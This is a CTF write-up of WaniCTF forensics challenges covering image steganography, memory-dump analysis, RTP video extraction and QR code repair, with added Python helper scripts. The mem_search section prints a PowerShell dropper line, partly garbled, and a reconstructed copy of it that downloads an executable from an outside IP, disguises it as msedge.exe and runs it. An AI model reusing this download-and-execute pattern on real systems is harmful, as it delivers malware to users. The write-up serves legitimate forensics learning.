# WaniCTF
Solved by Raviel
All the challenges: https://drive.google.com/drive/folders/1n-0bDNWddJO4AJDAYqCwFduhcAZgcK61?usp=sharing

---
## Tiny_usb
### Beginner

The challenge gave us an ISO file; just extract it and you will get the flag.

---
## Surveillance_of_sus
### Normal

The challenge gave us a .bin file, so I will run `strings` on it first.

I found out that it is an `RDP8bmp` file (the RDP bitmap cache format), so I will be using this **[tool](https://github.com/ANSSI-FR/bmc-tools)** (bmc-tools) to extract the cached tiles from it.


and you will get the flag.

You can try to piece the image back together yourself, or just guess the word and submit it.

---
## tiny_10px
### Normal

The challenge gave us a small picture:
 **<-------------- this is the image lol**
Based on the challenge name, tiny_10px, and the file size: how can such a tiny image be over 44 KB?

So the image data must be bigger than what the header declares: it is a JPEG, and the height and width are stored in the frame header (the SOF0 segment), so this is height/width steganography.

Do it yourself by modifying the hex bytes!
You may get this kind of result:

You can use an image editor or Paint to read the flag; anyway, here is the final flag:
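The header patch described above, as an added example that is not part of the original writeup: it walks the JPEG marker segments to the SOFn frame header, reads the declared height and width, and rewrites them. `SAMPLE_JPEG` is a constructed marker skeleton (not a viewable picture) declaring a 10x10 frame; `find_sof`, `set_dimensions` and the other names are mine.

```python
import struct
import sys

# SOFn markers (baseline, extended, progressive, lossless, ...) that carry the frame size.
SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7, 0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}
STANDALONE = {0x01, 0xD8} | set(range(0xD0, 0xD8))   # TEM, SOI, RSTn: no length field

# Constructed sample: a JPEG marker skeleton declaring a 10x10 frame.
# The scan data is filler, so this is not a viewable picture; only the
# segment layout (SOI, APP0, SOF0, SOS, EOI) matches a real file.
SAMPLE_JPEG = (
    b"\xff\xd8"                                                   # SOI
    + b"\xff\xe0" + struct.pack(">H", 16)
    + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"             # APP0 (JFIF)
    + b"\xff\xc0" + struct.pack(">H", 11)                          # SOF0, length 11
    + b"\x08" + struct.pack(">HH", 10, 10)                         # 8-bit, height=10, width=10
    + b"\x01" + b"\x01\x11\x00"                                    # one component
    + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"  # SOS
    + b"\x00" * 64                                                 # fake entropy-coded data
    + b"\xff\xd9"                                                  # EOI
)


def find_sof(data: bytes) -> int:
    """Walk the marker segments from SOI and return the offset of the SOFn marker."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte before a marker
            pos += 1
            continue
        if marker in SOF_MARKERS:
            return pos
        if marker == 0xDA:                 # SOS: entropy-coded data follows, SOF must precede it
            break
        if marker in STANDALONE:
            pos += 2
            continue
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len                 # the length field counts itself, not the marker
    raise ValueError("no SOF segment found before SOS")


def get_dimensions(data: bytes) -> tuple:
    """Return (width, height) as declared in the SOFn header."""
    sof = find_sof(data)
    height, width = struct.unpack(">HH", data[sof + 5:sof + 9])
    return width, height


def set_dimensions(data: bytes, width: int, height: int) -> bytes:
    """Return a copy of the file with the SOFn height/width fields rewritten."""
    sof = find_sof(data)
    return data[:sof + 5] + struct.pack(">HH", height, width) + data[sof + 9:]


def bytes_per_declared_pixel(data: bytes) -> float:
    """File size divided by the declared pixel count. A few bytes per pixel is
    normal for a JPEG; hundreds means the header dimensions have been shrunk."""
    width, height = get_dimensions(data)
    return len(data) / (width * height)


if __name__ == "__main__":
    # usage: python3 jpeg_dims.py in.jpg WIDTH HEIGHT out.jpg
    src, w, h, dst = sys.argv[1], int(sys.argv[2]), int(sys.argv[3]), sys.argv[4]
    with open(src, "rb") as f:
        blob = f.read()
    print("declared", get_dimensions(blob), "bytes/pixel %.1f" % bytes_per_declared_pixel(blob))
    with open(dst, "wb") as f:
        f.write(set_dimensions(blob, w, h))
```

When guessing the real size, the width has to be right or every row shears sideways; overshooting the height is usually harmless, because decoders just fill the rows they never reach with grey, so a large height is a cheap first try.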

---
## mem_search
### Hard

The challenge gave us a memory dump, so I will be using Volatility to solve this. The description also tells us that the user found an unknown file, so I will check the Downloads folder first.

After checking Downloads I found a suspicious file there, **read_this_as_admin.download**, so I dumped it right away.

The file sends the user to a website and downloads another file, so I will search for that file and read it too.


The file seems to execute a PowerShell script; after decoding the string, here is the result:
```
$u='ht'+'tp://192.168.0.16:8282/B64_dec'+'ode_RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ==/chall_mem_s'+'.arch.e'+'.xe';$t='Wan'+'iT'+'.mkdir -force $env:TMP\\.$t;try{iwgr -OutFile $d\\msedg.exe;& $d\\msedg.exe;}catch{}
```
The script builds the URL **http://192.168.0.16:8282/B64_decode_RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ==/chall_mem_search.exe** from concatenated string fragments,
creates the directory $env:TMP\\WanIT,
then attempts to download the file from that URL into the directory as **msedge.exe** (a name picked to blend in with Microsoft Edge) and executes it.
So we know the dropped malware's name, **"msedge.exe"**; I need to search for it in the dump and extract it.

Throw it into [VirusTotal](https://www.virustotal.com/gui/home/upload); here is the result:

**It's reversing time!**

The first thing that catches my eye is the fake flag, lol:
FLAG{Hacked_yikes_spooky}
Anyway, after analyzing the whole malware it led me nowhere, so we need to take a step back and look for more clues. Then I noticed something weird about the link:
**`B64_decode_RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ==`**
Why does it have the part "B64_decode_..."?
Then I base64-decoded the latter part and got the flag:
### **FLAG{Dayum_this_is_secret_file}**
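The two steps above (undoing the `'a'+'b'` string splitting to recover the URL, then noticing that a path segment is base64) as an added example, not part of the original writeup. `SAMPLE_SCRIPT` is constructed: the `$u` and `$t` fragments are the ones quoted above, while the download/exec tail is my reconstruction for illustration only, since the page's copy of that part is garbled. `fold_concats`, `base64_in_path` and the other names are mine; the base64 search tries every path segment and every suffix after an `_`, so it does not depend on the `B64_decode_` hint.

```python
import base64
import binascii
import re

# Constructed sample in the dropper's style (see lead-in: the tail after $t is reconstructed).
SAMPLE_SCRIPT = (
    "$u='ht'+'tp://192.168.0.16:8282/B64_dec'"
    "+'ode_RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ==/chall_mem_s'+'earch.e'+'xe';"
    "$t='Wan'+'iT';$d=\"$env:TMP\\$t\";mkdir -force $d;"
    "try{iwr $u -OutFile $d\\msedge.exe;& $d\\msedge.exe;}catch{}"
)

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a'+'b' (single-quoted, no interpolation)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")       # $name='literal'
URL = re.compile(r"https?://[^\s'\";]+")


def fold_concats(script: str) -> str:
    """Collapse 'a'+'b'+'c' into 'abc', repeating until nothing changes."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def simple_assignments(script: str) -> dict:
    """$name='literal' pairs after folding; enough for droppers of this style."""
    return dict(ASSIGN.findall(script))


def try_base64(s: str):
    """Strict decode: alphabet-checked, padded length, printable ASCII result, else None."""
    if len(s) < 8 or len(s) % 4:
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def base64_in_path(url: str) -> list:
    """Path segments that decode as base64, also trying the part after each '_'
    so that 'B64_decode_<b64>' is found without hard-coding that prefix."""
    found = []
    for seg in url.split("://", 1)[-1].split("/")[1:]:
        candidates = [seg] + [seg[i + 1:] for i, c in enumerate(seg) if c == "_"]
        for cand in candidates:            # longest candidate first
            text = try_base64(cand)
            if text:
                found.append((cand, text))
                break
    return found


def analyze(script: str) -> dict:
    """Fold the concatenations, collect variables and URLs, decode hidden path parts."""
    folded = fold_concats(script)
    urls = URL.findall(folded)
    return {
        "folded": folded,
        "vars": simple_assignments(folded),
        "urls": urls,
        "hidden": {u: base64_in_path(u) for u in urls},
    }


if __name__ == "__main__":
    r = analyze(SAMPLE_SCRIPT)
    print(r["folded"])
    for u in r["urls"]:
        print(u, "->", r["hidden"][u])
```

The strict decode (`validate=True`, length a multiple of 4, printable result) is what keeps ordinary segments like `chall_mem_search.exe` from producing garbage hits.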
---
## I_wanna_be_a_streamer
### Normal

The challenge gave us a pcap file

As you can see in the red box, the user connects to a camera using the RTP protocol.

After reading tons and tons of articles about the RTP protocol,
I finally found a way to solve this challenge:
* First install this plugin for your Wireshark:
**------>https://github.com/volvet/h264extractor<------**
* Open Wireshark > Analyze > Decode As > add the stream as RTP (or RTP payload) > Edit > Preferences > Protocols > H.264 (set the dynamic payload type to 96) > Tools > Extract h264 stream from RTP
* `ffmpeg -i file_extracted -c copy flag.mp4` (this wraps the raw H.264 stream into an MP4 without re-encoding)
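What the extraction step does under the hood, as an added example that is not part of the original writeup or of the h264extractor plugin: parse the RTP header (RFC 3550), keep only payload type 96, and rebuild H.264 NAL units from single-NAL, STAP-A and FU-A packets (RFC 6184) into an Annex B byte stream that `ffmpeg -c copy` can wrap. `SAMPLE_PACKETS` are constructed inline and the NAL contents are filler, not real SPS/PPS/slice data; `H264Depacketizer`, `extract_stream` and the other names are mine.

```python
import struct

START_CODE = b"\x00\x00\x00\x01"


def parse_rtp(pkt: bytes) -> dict:
    """Parse a raw RTP packet (RFC 3550) into header fields plus payload."""
    if len(pkt) < 12:
        raise ValueError("short RTP packet")
    b0, b1, seq, ts, ssrc = struct.unpack(">BBHII", pkt[:12])
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    has_padding, has_ext, cc = bool(b0 & 0x20), bool(b0 & 0x10), b0 & 0x0F
    off = 12 + 4 * cc                       # skip the CSRC list
    if has_ext:                             # skip a header extension
        _, ext_words = struct.unpack(">HH", pkt[off:off + 4])
        off += 4 + 4 * ext_words
    end = len(pkt) - (pkt[-1] if has_padding else 0)   # last byte = padding length
    return {"seq": seq, "ts": ts, "ssrc": ssrc, "marker": bool(b1 & 0x80),
            "pt": b1 & 0x7F, "payload": pkt[off:end]}


class H264Depacketizer:
    """Rebuild Annex B NAL units from RTP payloads per RFC 6184."""

    def __init__(self, payload_type: int = 96):
        self.pt = payload_type
        self.last_seq = None
        self.fu_buf = None                  # in-progress FU-A reassembly

    def feed(self, pkt: bytes) -> bytes:
        """Consume one RTP packet; return any completed NAL units (Annex B framed)."""
        hdr = parse_rtp(pkt)
        if hdr["pt"] != self.pt or len(hdr["payload"]) < 2:
            return b""
        lost = self.last_seq is not None and (hdr["seq"] - self.last_seq) & 0xFFFF != 1
        self.last_seq = hdr["seq"]
        if lost:
            self.fu_buf = None              # a gap inside a fragmented NAL makes it undecodable
        p = hdr["payload"]
        nal_type = p[0] & 0x1F
        if 1 <= nal_type <= 23:             # single NAL unit packet
            return START_CODE + p
        if nal_type == 24:                  # STAP-A: several NALs, each prefixed by a 2-byte size
            out, i = b"", 1
            while i + 2 <= len(p):
                size = struct.unpack(">H", p[i:i + 2])[0]
                out += START_CODE + p[i + 2:i + 2 + size]
                i += 2 + size
            return out
        if nal_type == 28:                  # FU-A: one NAL split over several packets
            fu_indicator, fu_header = p[0], p[1]
            if fu_header & 0x80:            # S bit: rebuild the NAL header from F/NRI + FU type
                self.fu_buf = bytes([(fu_indicator & 0xE0) | (fu_header & 0x1F)])
            if self.fu_buf is None:
                return b""                  # fragment without its start: drop it
            self.fu_buf += p[2:]
            if fu_header & 0x40:            # E bit: NAL complete
                nal, self.fu_buf = self.fu_buf, None
                return START_CODE + nal
            return b""
        return b""                          # STAP-B / MTAP / FU-B are not handled here


def extract_stream(packets, payload_type: int = 96) -> bytes:
    """Feed packets in capture order and concatenate the recovered Annex B stream."""
    d = H264Depacketizer(payload_type)
    return b"".join(d.feed(p) for p in packets)


# --- constructed sample traffic (NAL bytes are filler, not real parameter sets) ---
def make_rtp(seq, ts, payload, pt=96, marker=False):
    return struct.pack(">BBHII", 0x80, (0x80 if marker else 0) | pt, seq, ts, 0xDEADBEEF) + payload

SPS = b"\x67\x42\xc0\x1e\xda\x02\x80\xf6\x80"                  # NAL type 7
PPS = b"\x68\xce\x38\x80"                                      # NAL type 8
IDR = b"\x65\x88\x84\x00\x33\xff\xaa\xbb\xcc\xdd\xee"          # NAL type 5
stap_a = b"\x78" + struct.pack(">H", len(SPS)) + SPS + struct.pack(">H", len(PPS)) + PPS
fu_ind, body = (IDR[0] & 0xE0) | 28, IDR[1:]
fu_pkts = [bytes([fu_ind, 0x80 | (IDR[0] & 0x1F)]) + body[:3],   # S=1
           bytes([fu_ind, IDR[0] & 0x1F]) + body[3:6],            # middle
           bytes([fu_ind, 0x40 | (IDR[0] & 0x1F)]) + body[6:]]    # E=1
SAMPLE_PACKETS = [
    make_rtp(1000, 90000, stap_a),
    make_rtp(7, 90000, b"\x00" * 20, pt=97),   # another stream (e.g. audio), filtered by pt
    make_rtp(1001, 90000, fu_pkts[0]),
    make_rtp(1002, 90000, fu_pkts[1]),
    make_rtp(1003, 90000, fu_pkts[2], marker=True),
]

if __name__ == "__main__":
    stream = extract_stream(SAMPLE_PACKETS)
    print(len(stream), "bytes:", stream.hex())
```

For a real capture, pull the UDP payloads of the camera stream out of the pcap (scapy or dpkt both work), sort them by RTP sequence number, feed them through `extract_stream`, write the result to `flag.h264`, and then `ffmpeg -i flag.h264 -c copy flag.mp4` as in the last step above. The sequence-gap check matters on lossy captures: a fragment whose start was lost is dropped rather than glued onto the wrong NAL.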

---
## Codebreaker
### Beginner (I hate this chall)

The challenge gave us a QR code, but it is broken.

Just like one of the challenges I already did:
------>https://hackmd.io/v3qpKEIWT1-aZbWrkaS2Ig (sorry, I wrote it in Vietnamese)
I reconstructed the QR code by replacing the three corner finder patterns first.

Then I got the flag, lmao. I had bad luck: I tried a lot, and when I say a lot I really mean it; it cost me hours.
### FLAG{How_scan-dalous}

Okay, Mikka, thanks for the challenges; anyway, what a fun CTF to play.